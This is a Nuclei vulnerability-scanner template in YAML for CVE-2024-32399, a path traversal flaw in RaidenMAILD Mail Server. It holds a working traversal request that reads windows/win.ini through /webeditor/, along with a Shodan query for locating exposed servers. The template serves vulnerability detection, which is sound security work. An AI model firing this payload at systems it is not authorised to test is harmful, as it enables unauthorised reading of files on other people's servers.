36 lines
1.3 KiB
YAML
36 lines
1.3 KiB
YAML
id: CVE-2024-32399
|
|
|
|
info:
|
|
name: RaidenMAILD Mail Server v.4.9.4 - Path Traversal
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
|
|
reference:
|
|
- https://owasp.org/www-community/attacks/Path_Traversal
|
|
- https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md
|
|
- https://github.com/NN0b0dy/c01/blob/main/01.pdf
|
|
- https://github.com/NN0b0dy/CVE-2024-32399
|
|
- https://github.com/nomi-sec/PoC-in-GitHub
|
|
classification:
|
|
epss-score: 0.00053
|
|
epss-percentile: 0.21091
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: html:"RaidenMAILD"
|
|
tags: cve,cve2024,lfi,raiden,mail,server
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webeditor/../../../windows/win.ini"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body, "[fonts]", "for 16-bit app support")'
|
|
- 'contains(header, "application/octet-stream")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4b0a00483046022100a4e4fec406f9745a3ec5ab8ef88a44a13b351b1b3c8a4148416cf83776e7632c022100a63559fdc8153e058c817e01043c453e8af311de120d56c15030608f4b5c5598:922c64590222798bb761d5b6d8e72950 |